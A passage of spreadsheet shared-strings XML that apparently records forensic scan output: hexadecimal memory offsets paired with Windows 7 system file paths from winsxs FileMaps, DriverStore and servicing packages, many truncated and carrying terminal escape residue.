    <t>\Windows\winsxs\FileMaps\programdata_microsoft_ehome_logs_c9da3df2b39c6e43.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde76a238</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_windows_drm_cache_0462a9ca8b56f2bc.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde76a568</t>
  </si>
  <si>
    <t>0xde76a620</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_windows_drm_1409f63e8e701274.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde76aad0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_windows_devicemetadatastore_en-us_cc94fe8746890</t>
  </si>
  <si>
    <t>b55.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xde76aeb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_windows_ait_140a03828e6ffe97.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde76b150</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmeric.inf_x86_neutral_13608f1b6d6388d9\mdmeric.</t>
  </si>
  <si>
    <t>0xde76b298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_windows_nt_msscan_549c401cd5c756f4.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde76b680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_windows_nt_msfax_virtualinbox_en-us_9c5e5cbcf8e</t>
  </si>
  <si>
    <t>8df85.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde76b948</t>
  </si>
  <si>
    <t>\Windows\rescache\wip\ResCache.dir_x001B_[0K</t>
  </si>
  <si>
    <t>0xde76ba68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_windows_nt_msfax_common_coverpages_en-us_eec635</t>
  </si>
  <si>
    <t>e583fac604.cd</t>
  </si>
  <si>
    <t>0xde76bd98</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netbc6.inf_x86_neutral_a7e1745ea707c8d1\netbc6.in</t>
  </si>
  <si>
    <t>0xde76be50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_windows_nt_msfax_common_coverpages_642a277e0ccb</t>
  </si>
  <si>
    <t>775c.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xde76c1d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_d7a65bb2f0e854e7.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde76c5b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_wwansvc_profiles_d39df26c249b675d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde76c9b0</t>
  </si>
  <si>
    <t>\Windows\System32\ksuser.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde76ca68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_wwansvc_b22df3b43960e1d3.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde76ce50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\programdata_microsoft_windows_power_efficiency_diagnostics_acddb9fca5</t>
  </si>
  <si>
    <t>769337.cdf-ms</t>
  </si>
  <si>
    <t>0xde76d0f0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmcpv.inf_x86_neutral_424f03b97cc007db\mdmcpv.in</t>
  </si>
  <si>
    <t>0xde76d5a0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_1.0_c96a7f20e8d9af65.</t>
  </si>
  <si>
    <t>0xde76da18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_dao_3c86dc390b3b2f48.cdf-</t>
  </si>
  <si>
    <t>0xde76dc00</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_818c5a0e45020fba.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xde76de00</t>
  </si>
  <si>
    <t>0xde76deb8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmcpq.inf_x86_neutral_1965855805a8e768\mdmcpq.in</t>
  </si>
  <si>
    <t>0xde76e2d0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\tdibth.inf_x86_neutral_b67cdc538738f6b9\tdibth.in</t>
  </si>
  <si>
    <t>0xde76e6e8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_ar-sa_827c11e62573e02</t>
  </si>
  <si>
    <t>c.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde76ea78</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\bthpan.inf_x86_neutral_9116bd8b7a2a8172\bthpan.in</t>
  </si>
  <si>
    <t>0xde76eb98</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_3c86e3db0b3b254c.cdf-</t>
  </si>
  <si>
    <t>0xde76ef80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_1.7_c96a7f2ee8d9af26.</t>
  </si>
  <si>
    <t>0xde76f300</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_de-de_882f82201ce6b66</t>
  </si>
  <si>
    <t>0xde76f5a0</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Microsoft-Windows-IIS-WebServer-AddOn-Package~31bf3856ad364e35~x86</t>
  </si>
  <si>
    <t>~~6.1.7600.16</t>
  </si>
  <si>
    <t>385.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde76f6e8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_da-dk_882f8e141ce6a40</t>
  </si>
  <si>
    <t>d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde76f9b0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netb57vx.inf_x86_neutral_575b8ca932333f72\netb57v</t>
  </si>
  <si>
    <t>0xde76fad0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_cs-cz_8649306c1fc0326</t>
  </si>
  <si>
    <t>e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde76fe00</t>
  </si>
  <si>
    <t>\Windows\rescache\wip\Segment2.cmf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde76feb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_bg-bg_84629670229a182</t>
  </si>
  <si>
    <t>3.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde770298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_es-es_8a1612561a0cdf9</t>
  </si>
  <si>
    <t>1.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde770748</t>
  </si>
  <si>
    <t>\Program Files\Common Files\microsoft shared\ink\en-US\ShapeCollector.exe.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde770a78</t>
  </si>
  <si>
    <t>0xde770b30</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_en-us_8a16130a1a0cde0</t>
  </si>
  <si>
    <t>0xde770e60</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\windowssideshowenhanceddriver.inf_x86_neutral_184</t>
  </si>
  <si>
    <t>a2ef2a8f57c33</t>
  </si>
  <si>
    <t>\WindowsSid</t>
  </si>
  <si>
    <t>eShowE</t>
  </si>
  <si>
    <t>nhancedDriver.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde770f18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_el-gr_8a16116c1a0ce03</t>
  </si>
  <si>
    <t>5.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde771360</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_fsdefinitions_92b215e</t>
  </si>
  <si>
    <t>c670a7f35.cdf</t>
  </si>
  <si>
    <t>0xde771748</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_fr-fr_8bfc882e17332eb</t>
  </si>
  <si>
    <t>0xde771b30</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_fi-fi_8bfc785c1733457</t>
  </si>
  <si>
    <t>0xde771f18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_et-ee_8a15f79e1a0d07c</t>
  </si>
  <si>
    <t>0.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde772360</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_fsdefinitions_numbers</t>
  </si>
  <si>
    <t>_4ea57ed36511</t>
  </si>
  <si>
    <t>f733.cdf-ms</t>
  </si>
  <si>
    <t>0xde772748</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_fsdefinitions_main_99</t>
  </si>
  <si>
    <t>2db4c6307e339</t>
  </si>
  <si>
    <t>e.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xde772b30</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_fsdefinitions_keypad_</t>
  </si>
  <si>
    <t>bb29f287c24d4</t>
  </si>
  <si>
    <t>a93.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde772f18</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_fsdefinitions_auxpad_</t>
  </si>
  <si>
    <t>bb15ebb5c2b76</t>
  </si>
  <si>
    <t>782.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde773298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_fsdefinitions_symbols</t>
  </si>
  <si>
    <t>_4eaf815d64e8</t>
  </si>
  <si>
    <t>ecbc.cdf-ms</t>
  </si>
  <si>
    <t>0xde773680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_fsdefinitions_oskpred</t>
  </si>
  <si>
    <t>_4ada71c56aba</t>
  </si>
  <si>
    <t>89ef.cdf-ms</t>
  </si>
  <si>
    <t>0xde773a68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_fsdefinitions_osknump</t>
  </si>
  <si>
    <t>ad_ee37ed1959</t>
  </si>
  <si>
    <t>58108b.cdf-</t>
  </si>
  <si>
    <t>0xde773e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_fsdefinitions_oskmenu</t>
  </si>
  <si>
    <t>_4ada925d6aba</t>
  </si>
  <si>
    <t>5911.cdf-ms</t>
  </si>
  <si>
    <t>0xde774150</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx008.inf_x86_neutral_7777e9ad978d9704\prnlx00</t>
  </si>
  <si>
    <t>0xde774298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_hu-hu_8fc97ca8117fc04</t>
  </si>
  <si>
    <t>0xde774680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_hr-hr_8fc97762117fc7e</t>
  </si>
  <si>
    <t>0xde774920</t>
  </si>
  <si>
    <t>\Windows\servicing\Packages\Package_for_KB4040980_SP1~31bf3856ad364e35~x86~~6.1.1.0.mum_x001B_[0K</t>
  </si>
  <si>
    <t>0xde774a68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_he-il_8fc96dd2117fd4e</t>
  </si>
  <si>
    <t>0xde774d30</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wiabr007.inf_x86_neutral_50c5638ba44de2c4\wiabr00</t>
  </si>
  <si>
    <t>0xde774e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_fsdefinitions_web_310</t>
  </si>
  <si>
    <t>c2550dac9ac6b</t>
  </si>
  <si>
    <t>0xde7751d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_ko-kr_957cde9c08f2acc</t>
  </si>
  <si>
    <t>2.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7755b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_ja-jp_9396652e0bcc616</t>
  </si>
  <si>
    <t>0xde7759a0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_it-it_91aff2800ea60f7</t>
  </si>
  <si>
    <t>0xde775d88</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_hwrcustomization_198f</t>
  </si>
  <si>
    <t>bcb0f379ad82.</t>
  </si>
  <si>
    <t>0xde776038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ph3xibc7.inf_x86_neutral_348f512722c79525\Ph3xIBC</t>
  </si>
  <si>
    <t>0xde776300</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_nl-nl_9b303a720065a2b</t>
  </si>
  <si>
    <t>0xde7766e8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_nb-no_9b30418c006596f</t>
  </si>
  <si>
    <t>0xde776a18</t>
  </si>
  <si>
    <t>\Windows\rescache\wip\Segment0.cmf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde776ad0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_lv-lv_97635cd20618f02</t>
  </si>
  <si>
    <t>0xde776e00</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnso002.inf_x86_neutral_650312518f503b7b\prnso00</t>
  </si>
  <si>
    <t>0xde776eb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_lt-lt_9763594e0618f53</t>
  </si>
  <si>
    <t>0xde777148</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wdmvsc.inf_x86_neutral_a2cf745000e2ea92\wdmvsc.in</t>
  </si>
  <si>
    <t>0xde777298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_ro-ro_a2ca1e1ff4fecd8</t>
  </si>
  <si>
    <t>0xde7775c8</t>
  </si>
  <si>
    <t>\Windows\System32\AuthFWGP.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xde777680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_pt-pt_9efd37b5fab227a</t>
  </si>
  <si>
    <t>0xde777a68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_pt-br_9efd33e9fab22d4</t>
  </si>
  <si>
    <t>0xde777d98</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmarn.inf_x86_neutral_661b8f49b2e37287\mdmarn.in</t>
  </si>
  <si>
    <t>0xde777e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_pl-pl_9efd29a5fab23be</t>
  </si>
  <si>
    <t>0xde778298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_sr-latn-cs_c779913ce1</t>
  </si>
  <si>
    <t>dfaa20.cdf-ms</t>
  </si>
  <si>
    <t>0xde778680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_sl-si_a4b08ac1f2252a4</t>
  </si>
  <si>
    <t>0xde778a68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_sk-sk_a4b08eb1f225243</t>
  </si>
  <si>
    <t>0xde778e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_ru-ru_a2ca28abf4febe5</t>
  </si>
  <si>
    <t>0xde7791d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_uk-ua_a87d6ae9ec71d9e</t>
  </si>
  <si>
    <t>0xde779498</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wvmic.inf_x86_neutral_b94eb92e8150fa35\wvmic.inf_x001B_</t>
  </si>
  <si>
    <t>0xde7795b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_tr-tr_a6971299ef4b5f1</t>
  </si>
  <si>
    <t>0xde7799a0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_th-th_a6970105ef4b786</t>
  </si>
  <si>
    <t>0xde779c40</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\ts_generic.inf_x86_neutral_4678e55cce9859ad\ts_ge</t>
  </si>
  <si>
    <t>neric.inf_x001B_[0K</t>
  </si>
  <si>
    <t>0xde779d88</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_sv-se_a4b081c1f22538c</t>
  </si>
  <si>
    <t>0xde77a200</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_msinfo_en-us_98319174bb92</t>
  </si>
  <si>
    <t>bc08.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xde77a5e8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_msinfo_817ad0c7c1c8e490.c</t>
  </si>
  <si>
    <t>0xde77a9d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_zh-tw_b1fdeb1bde31194</t>
  </si>
  <si>
    <t>0xde77adb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_ink_zh-cn_b1fdda05de3132d</t>
  </si>
  <si>
    <t>0xde77b038</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnep00d.inf_x86_neutral_9fef51141804900a\prnep00</t>
  </si>
  <si>
    <t>0xde77b520</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_textconv_en-us_c7ff7b7c62</t>
  </si>
  <si>
    <t>90f6ab.cdf-ms</t>
  </si>
  <si>
    <t>0xde77b7b8</t>
  </si>
  <si>
    <t>0xde77b908</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_textconv_dfb016a4185c8725</t>
  </si>
  <si>
    <t>0xde77bbd0</t>
  </si>
  <si>
    <t>\Windows\rescache\wip\Segment1.toc_x001B_[0K</t>
  </si>
  <si>
    <t>0xde77bcf0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_stationery_3f6c21eb4ac66a</t>
  </si>
  <si>
    <t>56.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde77c038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_triedit_en-us_59ae2daa074</t>
  </si>
  <si>
    <t>29081.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xde77c480</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_speechengines_microsoft_tts20_01244a185609</t>
  </si>
  <si>
    <t>7a63.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xde77c868</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_services_e36ba211a9258e5f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde77cb98</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\xcbdav.inf_x86_neutral_8e8664e62708b91f\xcbdav.in</t>
  </si>
  <si>
    <t>0xde77cc50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_microsoft_shared_vgx_3c86fd9f0b3afd9b.cdf-</t>
  </si>
  <si>
    <t>0xde77d038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_speechengines_microsoft_tts20_en-us_d56022</t>
  </si>
  <si>
    <t>7d1a443333.cd</t>
  </si>
  <si>
    <t>0xde77d3b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_system_ado_en-us_9c12689ac1360dc2.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xde77d7a0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_system_ado_149a784bc852a2c0.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde77dad0</t>
  </si>
  <si>
    <t>0xde77db88</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_speechengines_microsoft_tts20_en-us_enu-ds</t>
  </si>
  <si>
    <t>k_bd3acd2fa81</t>
  </si>
  <si>
    <t>62df2.cdf-m</t>
  </si>
  <si>
    <t>0xde77e4f8</t>
  </si>
  <si>
    <t>0xde77e7b0</t>
  </si>
  <si>
    <t>\Program Files\Common Files\System\en-US\wab32res.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xde77eb98</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_system_en-us_48bd774a3f1387ec.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde77ee60</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\angel2.inf_x86_neutral_6a809c9c7f9c8486\Angel2.in</t>
  </si>
  <si>
    <t>0xde77ef80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_system_b13078daf1286f60.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde77f3e0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnkm003.inf_x86_neutral_ea465b3729b37f54\prnkm00</t>
  </si>
  <si>
    <t>0xde77f530</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_system_ole_db_en-us_5ff73071fce05070.cdf-m</t>
  </si>
  <si>
    <t>0xde77f918</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_system_ole_db_48d1b11cd4e5cabe.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde77fbe0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\iirsp.inf_x86_neutral_25c14d33af7f54f1\iirsp.inf_x001B_</t>
  </si>
  <si>
    <t>0xde77fd00</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_system_msadc_en-us_58bb034fa66b57cc.cdf-ms</t>
  </si>
  <si>
    <t>0xde77ff80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_common_files_system_msadc_48cda3763ecb3874.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde780298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_5fb67e37dd207bb6.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde780680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_a54613779b918be2.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde780948</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnca00i.inf_x86_neutral_ab67935506742738\prnca00</t>
  </si>
  <si>
    <t>0xde780a68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_en-us_5c61cfeeeb9f5061.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde780e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_405775de8763ce75.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7810f8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnep00l.inf_x86_neutral_3323920c1a72a42d\prnep00</t>
  </si>
  <si>
    <t>0xde7811d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_full_8bfb7c162731e4e9.cdf-ms</t>
  </si>
  <si>
    <t>0xde7815b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_flippage_f73c094c7f16edbe.cd</t>
  </si>
  <si>
    <t>0xde781880</t>
  </si>
  <si>
    <t>\Windows\rescache\wip\ResCache.hit_x001B_[0K</t>
  </si>
  <si>
    <t>0xde7819a0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_babygirl_08d06a5a64874f02.cd</t>
  </si>
  <si>
    <t>0xde781e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_babyboy_c89d1dc244d4409a.cdf</t>
  </si>
  <si>
    <t>0xde782148</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\acpipmi.inf_x86_neutral_71194ee3f26255a7\acpipmi.</t>
  </si>
  <si>
    <t>0xde782200</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_oldage_c6de81a917a8cf68.cdf-</t>
  </si>
  <si>
    <t>0xde7824c8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\netgb6.inf_x86_neutral_437f729e64df024b\netgb6.in</t>
  </si>
  <si>
    <t>0xde7825e8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_memories_f44b6a98846b15a5.cd</t>
  </si>
  <si>
    <t>0xde7829d0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_layeredtitles_c4062449752ea4</t>
  </si>
  <si>
    <t>b1.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xde782d00</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmmct.inf_x86_neutral_2175f3d457a013a9\Mdmmct.in</t>
  </si>
  <si>
    <t>0xde782db8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_huecycle_de51e7f0a4721fb8.cd</t>
  </si>
  <si>
    <t>0xde783400</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmgsm.inf_x86_neutral_b9136824e071aa43\mdmgsm.in</t>
  </si>
  <si>
    <t>0xde783520</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_push_8bfb73162731f37e.cdf-ms</t>
  </si>
  <si>
    <t>0xde783908</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_pets_8bfb87d82731d4bc.cdf-ms</t>
  </si>
  <si>
    <t>0xde783db8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_performance_62d38a628f8404ee</t>
  </si>
  <si>
    <t>0xde784038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_rectangles_5bea48dc003ff122.</t>
  </si>
  <si>
    <t>0xde784480</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_specialoccasion_e32b316f8a75</t>
  </si>
  <si>
    <t>bd6e.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xde784748</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmbug3.inf_x86_neutral_c29e5576244e2124\mdmbug3.</t>
  </si>
  <si>
    <t>0xde784868</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_shatter_c6467e7e49f697fb.cdf</t>
  </si>
  <si>
    <t>0xde784c50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_resizingpanels_d3ead0ed83352</t>
  </si>
  <si>
    <t>928.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xde785038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_sports_c6567ebf18c8e989.cdf-</t>
  </si>
  <si>
    <t>0xde7853b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\program_files_dvd_maker_shared_dvdstyles_videowall_3cbc91699310ec3d.c</t>
  </si>
  <si>
    <t>0xde7857a0</t>
  </si>
  <si>
